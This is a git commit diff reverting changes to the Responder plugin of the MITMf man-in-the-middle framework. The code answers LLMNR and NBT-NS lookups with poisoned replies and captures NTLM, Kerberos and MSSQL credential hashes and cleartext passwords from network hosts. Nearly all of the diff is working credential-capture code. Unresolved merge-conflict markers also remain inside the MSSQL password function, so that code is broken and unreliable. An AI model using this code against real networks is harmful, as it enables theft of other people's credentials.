Revert "fixed Responder plugin output"

This reverts commit cd9a16de55.

Reverting because this commit caused a lot of things in the plugin to stop working (??)
byt3bl33d3r 2015-03-30 18:13:21 +02:00
commit 3c6a9fe89d
2 changed files with 179 additions and 180 deletions


@ -2,8 +2,7 @@
[MITMf] [MITMf]
#here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` #here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory)
#(assuming you config file is in the default directory)
args='' args=''
#Required BeEF and Metasploit options #Required BeEF and Metasploit options


@ -291,19 +291,17 @@ class NB(BaseRequestHandler):
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
Message = "%s [Analyze mode: NBT-NS] OS: %s Client Version: %s is looking for: %s Service requested is: %s"%(self.client_address[0], Finger[0], Finger[1], Name, NBT_NS_Role(data[43:46])) Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1])
logger3.warning(Message) logger3.warning(Message)
except Exception: except Exception:
Message = "%s [Analyze mode: NBT-NS] is looking for : %s Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
logger3.warning(Message) logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
#print Message print Message
logger3.warning(Message)
else: else:
Message = "%s [Analyze mode: NBT-NS] is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
#print Message print Message
logger3.warning(Message)
logger3.warning(Message) logger3.warning(Message)
if RespondToSpecificHost(RespondTo) and Analyze(AnalyzeMode) == False: if RespondToSpecificHost(RespondTo) and Analyze(AnalyzeMode) == False:
@ -319,17 +317,17 @@ class NB(BaseRequestHandler):
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
DnsCache.getInstance().setCustomRes(Name.lower()) DnsCache.getInstance().setCustomRes(Name.lower())
@ -340,17 +338,17 @@ class NB(BaseRequestHandler):
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
else: else:
pass pass
@ -369,17 +367,17 @@ class NB(BaseRequestHandler):
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
p#rint '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if RespondToSpecificName(RespondToName) == False: if RespondToSpecificName(RespondToName) == False:
DnsCache.getInstance().setCustomRes(Name.lower()) DnsCache.getInstance().setCustomRes(Name.lower())
@ -390,17 +388,17 @@ class NB(BaseRequestHandler):
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
else: else:
pass pass
@ -460,17 +458,17 @@ def RAPThisDomain(Client,Domain):
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80") PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
if PDC is not None: if PDC is not None:
l.append('[Analyze mode LANMAN]:') l.append('[Analyze mode LANMAN]:')
l.append('Domain detected on this network:') l.append('[!]Domain detected on this network:')
for x in PDC: for x in PDC:
l.append(' -'+x) l.append(' -'+x)
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00") SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
if SQL is not None: if SQL is not None:
l.append('SQL Server detected on Domain %s:'%(Domain)) l.append('[!]SQL Server detected on Domain %s:'%(Domain))
for x in SQL: for x in SQL:
l.append(' -'+x) l.append(' -'+x)
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff") WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
if WKST is not None: if WKST is not None:
l.append('Workstations/Servers detected on Domain %s:'%(Domain)) l.append('[!]Workstations/Servers detected on Domain %s:'%(Domain))
for x in WKST: for x in WKST:
l.append(' -'+x) l.append(' -'+x)
else: else:
@ -537,12 +535,11 @@ def BecomeBackup(data,Client):
Role = NBT_NS_Role(data[45:48]) Role = NBT_NS_Role(data[45:48])
Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain) Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain)
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
#print Message print Message
logger3.warning(Message)
if AnalyzeMode: if AnalyzeMode:
Message1=RAPThisDomain(Client,Domain) Message1=RAPThisDomain(Client,Domain)
if PrintLLMNRNBTNS(AnalyzeFilename,Message1): if PrintLLMNRNBTNS(AnalyzeFilename,Message1):
#print Message1 print Message1
logger3.warning(Message1) logger3.warning(Message1)
logger3.warning(Message) logger3.warning(Message)
except: except:
@ -557,12 +554,11 @@ def ParseDatagramNBTNames(data,Client):
Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Name, Role1, Domain, Role2) Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Name, Role1, Domain, Role2)
if Role2 == "Domain controller service. This name is a domain controller." or Role2 == "Browser Election Service." or Role2 == "Local Master Browser.": if Role2 == "Domain controller service. This name is a domain controller." or Role2 == "Browser Election Service." or Role2 == "Local Master Browser.":
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
#print Message print Message
logger3.warning(Message)
if AnalyzeMode: if AnalyzeMode:
Message1=RAPThisDomain(Client,Domain) Message1=RAPThisDomain(Client,Domain)
if PrintLLMNRNBTNS(AnalyzeFilename,Message1): if PrintLLMNRNBTNS(AnalyzeFilename,Message1):
#print Message1 print Message1
logger3.warning(Message1) logger3.warning(Message1)
logger3.warning(Message) logger3.warning(Message)
except: except:
@ -676,10 +672,10 @@ def ParseSMBHash(data,client):
writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
outfile = os.path.join(ResponderPATH,"SMB-NTLMv1ESS-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"SMB-NTLMv1ESS-Client-"+client+".txt")
if PrintData(outfile,User+"::"+Domain): if PrintData(outfile,User+"::"+Domain):
logging.warning("SMB-NTLMv1 hash captured from : ",client) print "[+]SMB-NTLMv1 hash captured from : ",client
logging.warning("SMB complete hash is :", writehash) print "[+]SMB complete hash is :", writehash
WriteData(outfile,writehash,User+"::"+Domain) WriteData(outfile,writehash,User+"::"+Domain)
logging.warning('SMB-NTLMv1 complete hash is :%s'%(writehash)) logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))
if NthashLen > 60: if NthashLen > 60:
outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt")
@ -692,10 +688,10 @@ def ParseSMBHash(data,client):
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
writehash = User+"::"+Domain+":"+NumChal+":"+NtHash[:32]+":"+NtHash[32:] writehash = User+"::"+Domain+":"+NumChal+":"+NtHash[:32]+":"+NtHash[32:]
if PrintData(outfile,User+"::"+Domain): if PrintData(outfile,User+"::"+Domain):
logging.warning("SMB-NTLMv2 hash captured from : ",client) print "[+]SMB-NTLMv2 hash captured from : ",client
logging.warning("SMB complete hash is :", writehash) print "[+]SMB complete hash is :", writehash
WriteData(outfile,writehash,User+"::"+Domain) WriteData(outfile,writehash,User+"::"+Domain)
logging.warning('SMB-NTLMv2 complete hash is :%s'%(writehash)) logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(writehash))
#Parse SMB NTLMv1/v2 #Parse SMB NTLMv1/v2
def ParseLMNTHash(data,client): def ParseLMNTHash(data,client):
@ -706,33 +702,33 @@ def ParseLMNTHash(data,client):
Bcc = struct.unpack('<H',data[63:65])[0] Bcc = struct.unpack('<H',data[63:65])[0]
if NthashLen > 25: if NthashLen > 25:
Hash = data[65+LMhashLen:65+LMhashLen+NthashLen] Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
logging.warning('SMB-NTLMv2 hash captured from :%s'%(client)) logging.warning('[+]SMB-NTLMv2 hash captured from :%s'%(client))
outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt")
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
Username, Domain = tuple(var) Username, Domain = tuple(var)
Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper() Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper()
if PrintData(outfile,Username+"::"+Domain): if PrintData(outfile,Username+"::"+Domain):
logging.warning("SMB-NTLMv2 hash captured from :",client) print "[+]SMB-NTLMv2 hash captured from :",client
logging.warning("SMB-NTLMv2 complete hash is :",Writehash) print "[+]SMB-NTLMv2 complete hash is :",Writehash
ParseShare(data) ParseShare(data)
WriteData(outfile,Writehash, Username+"::"+Domain) WriteData(outfile,Writehash, Username+"::"+Domain)
logging.warning('SMB-NTLMv2 complete hash is :%s'%(Writehash)) logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash))
if NthashLen == 24: if NthashLen == 24:
logging.warning('SMB-NTLMv1 hash captured from :%s'%(client)) logging.warning('[+]SMB-NTLMv1 hash captured from :%s'%(client))
outfile = os.path.join(ResponderPATH,"SMB-NTLMv1-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"SMB-NTLMv1-Client-"+client+".txt")
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
Username, Domain = tuple(var) Username, Domain = tuple(var)
writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal
if PrintData(outfile,Username+"::"+Domain): if PrintData(outfile,Username+"::"+Domain):
logging.warning("SMB-NTLMv1 hash captured from : ",client) print "[+]SMB-NTLMv1 hash captured from : ",client
logging.warning("SMB complete hash is :", writehash) print "[+]SMB complete hash is :", writehash
ParseShare(data) ParseShare(data)
WriteData(outfile,writehash, Username+"::"+Domain) WriteData(outfile,writehash, Username+"::"+Domain)
logging.warning('SMB-NTLMv1 complete hash is :%s'%(writehash)) logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))
logging.warning('SMB-NTLMv1 Username:%s'%(Username)) logging.warning('[+]SMB-NTLMv1 Username:%s'%(Username))
logging.warning('SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain)) logging.warning('[+]SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain))
except Exception: except Exception:
raise raise
@ -748,7 +744,7 @@ def IsNT4ClearTxt(data):
if PassLen > 2: if PassLen > 2:
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","") Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","") User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
#print "[SMB]Clear Text Credentials: %s:%s" %(User,Password) print "[SMB]Clear Text Credentials: %s:%s" %(User,Password)
logging.warning("[SMB]Clear Text Credentials: %s:%s"%(User,Password)) logging.warning("[SMB]Clear Text Credentials: %s:%s"%(User,Password))
#SMB Server class, NTLMSSP #SMB Server class, NTLMSSP
@ -989,11 +985,11 @@ class KerbTCP(BaseRequestHandler):
if KerbHash: if KerbHash:
Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt")
if PrintData(Outfile,KerbHash): if PrintData(Outfile,KerbHash):
logging.warning("MSKerbv5 hash captured from : ", self.client_address[0]) print "[+]MSKerbv5 hash captured from : ", self.client_address[0]
#print "[+]MSKerbv5 complete hash is :", KerbHash print "[+]MSKerbv5 complete hash is :", KerbHash
Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt")
WriteData(Outfile,KerbHash, KerbHash) WriteData(Outfile,KerbHash, KerbHash)
logging.warning('MSKerbv5 complete hash is :%s'%(KerbHash)) logging.warning('[+]MSKerbv5 complete hash is :%s'%(KerbHash))
except Exception: except Exception:
raise raise
@ -1006,11 +1002,11 @@ class KerbUDP(BaseRequestHandler):
if KerbHash: if KerbHash:
Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt")
if PrintData(Outfile,KerbHash): if PrintData(Outfile,KerbHash):
logging.warning("MSKerbv5 hash captured from : ", self.client_address[0]) print "[+]MSKerbv5 hash captured from : ", self.client_address[0]
#print "[+]MSKerbv5 complete hash is :", KerbHash print "[+]MSKerbv5 complete hash is :", KerbHash
Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt")
WriteData(Outfile,KerbHash, KerbHash) WriteData(Outfile,KerbHash, KerbHash)
logging.warning('MSKerbv5 complete hash is :%s'%(KerbHash)) logging.warning('[+]MSKerbv5 complete hash is :%s'%(KerbHash))
except Exception: except Exception:
raise raise
@ -1037,13 +1033,13 @@ def ParseSQLHash(data,client):
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
outfile = os.path.join(ResponderPATH,"MSSQL-NTLMv1-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"MSSQL-NTLMv1-Client-"+client+".txt")
if PrintData(outfile,User+"::"+Domain): if PrintData(outfile,User+"::"+Domain):
logging.warning("MSSQL NTLMv1 hash captured from :",client) print "[+]MSSQL NTLMv1 hash captured from :",client
logging.warning('MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) print '[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)
WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain) WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain)
logging.warning('MsSQL NTLMv1 hash captured from :%s'%(client)) logging.warning('[+]MsSQL NTLMv1 hash captured from :%s'%(client))
logging.warning('MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00',''))) logging.warning('[+]MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
logging.warning('MSSQL NTLMv1 Domain is :%s'%(Domain)) logging.warning('[+]MSSQL NTLMv1 Domain is :%s'%(Domain))
logging.warning('MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) logging.warning('[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal))
if NthashLen > 60: if NthashLen > 60:
DomainLen = struct.unpack('<H',data[36:38])[0] DomainLen = struct.unpack('<H',data[36:38])[0]
NthashOffset = struct.unpack('<H',data[32:34])[0] NthashOffset = struct.unpack('<H',data[32:34])[0]
@ -1057,13 +1053,13 @@ def ParseSQLHash(data,client):
outfile = os.path.join(ResponderPATH,"MSSQL-NTLMv2-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"MSSQL-NTLMv2-Client-"+client+".txt")
Writehash = User+"::"+Domain+":"+NumChal+":"+Hash[:32].upper()+":"+Hash[32:].upper() Writehash = User+"::"+Domain+":"+NumChal+":"+Hash[:32].upper()+":"+Hash[32:].upper()
if PrintData(outfile,User+"::"+Domain): if PrintData(outfile,User+"::"+Domain):
logging.warning("MSSQL NTLMv2 Hash captured from :",client) print "[+]MSSQL NTLMv2 Hash captured from :",client
logging.warning("MSSQL NTLMv2 Complete Hash is : ", Writehash) print "[+]MSSQL NTLMv2 Complete Hash is : ", Writehash
WriteData(outfile,Writehash,User+"::"+Domain) WriteData(outfile,Writehash,User+"::"+Domain)
logging.warning('MsSQL NTLMv2 hash captured from :%s'%(client)) logging.warning('[+]MsSQL NTLMv2 hash captured from :%s'%(client))
logging.warning('MSSQL NTLMv2 Domain is :%s'%(Domain)) logging.warning('[+]MSSQL NTLMv2 Domain is :%s'%(Domain))
logging.warning('MSSQL NTLMv2 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00',''))) logging.warning('[+]MSSQL NTLMv2 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
logging.warning('MSSQL NTLMv2 Complete Hash is : %s'%(Writehash)) logging.warning('[+]MSSQL NTLMv2 Complete Hash is : %s'%(Writehash))
def ParseSqlClearTxtPwd(Pwd): def ParseSqlClearTxtPwd(Pwd):
Pwd = map(ord,Pwd.replace('\xa5','')) Pwd = map(ord,Pwd.replace('\xa5',''))
@ -1082,11 +1078,16 @@ def ParseClearTextSQLPass(Data,client):
PwdStr = ParseSqlClearTxtPwd(Data[8+PwdOffset:8+PwdOffset+PwdLen]) PwdStr = ParseSqlClearTxtPwd(Data[8+PwdOffset:8+PwdOffset+PwdLen])
UserName = Data[8+UsernameOffset:8+UsernameOffset+UsernameLen].decode('utf-16le') UserName = Data[8+UsernameOffset:8+UsernameOffset+UsernameLen].decode('utf-16le')
if PrintData(outfile,UserName+":"+PwdStr): if PrintData(outfile,UserName+":"+PwdStr):
<<<<<<< HEAD
logging.warning("MSSQL PlainText Password captured from :",str(client)) logging.warning("MSSQL PlainText Password captured from :",str(client))
logging.warning("MSSQL Username: %s Password: %s"%(UserName, PwdStr)) logging.warning("MSSQL Username: %s Password: %s"%(UserName, PwdStr))
=======
print "[+]MSSQL PlainText Password captured from :",client
print "[+]MSSQL Username: %s Password: %s"%(UserName, PwdStr)
>>>>>>> parent of cd9a16d... fixed Responder plugin output
WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr) WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr)
logging.warning('MSSQL PlainText Password captured from :%s'%(client)) logging.warning('[+]MSSQL PlainText Password captured from :%s'%(client))
logging.warning('MSSQL Username: %s Password: %s'%(UserName, PwdStr)) logging.warning('[+]MSSQL Username: %s Password: %s'%(UserName, PwdStr))
def ParsePreLoginEncValue(Data): def ParsePreLoginEncValue(Data):
@ -1194,7 +1195,7 @@ def IsICMPRedirectPlausible(IP):
dnsip.extend(ip[1:]) dnsip.extend(ip[1:])
for x in dnsip: for x in dnsip:
if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False: if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
print "| |_ [Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (%s) is not on the same subnet than the DNS server (%s). Use python Icmp-Redirect.py for more details."%(IP, x) print "[Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (%s) is not on the same subnet than the DNS server (%s). Use python Icmp-Redirect.py for more details."%(IP, x)
else: else:
pass pass
@ -1223,16 +1224,17 @@ class LLMNR(BaseRequestHandler):
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
Message = "%s [Analyze mode: LLMNR] OS: %s Client Version: %s is looking for : %s"%(self.client_address[0],Finger[0],Finger[1],Name) Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,Finger[0],Finger[1])
logger3.warning(Message) logger3.warning(Message)
except Exception: except Exception:
Message = "%s [Analyze mode: LLMNR] is looking for : %s."%(self.client_address[0], Name) Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name)
logger3.warning(Message) logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
logger3.warning(Message) print Message
else: else:
Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name) Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name)
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
logger3.warning(Message) logger3.warning(Message)
if DontRespondToSpecificHost(DontRespondTo): if DontRespondToSpecificHost(DontRespondTo):
@ -1254,17 +1256,17 @@ class LLMNR(BaseRequestHandler):
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
@ -1276,17 +1278,17 @@ class LLMNR(BaseRequestHandler):
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False: if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
@ -1298,17 +1300,17 @@ class LLMNR(BaseRequestHandler):
for x in range(1): for x in range(1):
soc.sendto(str(buff), self.client_address) soc.sendto(str(buff), self.client_address)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
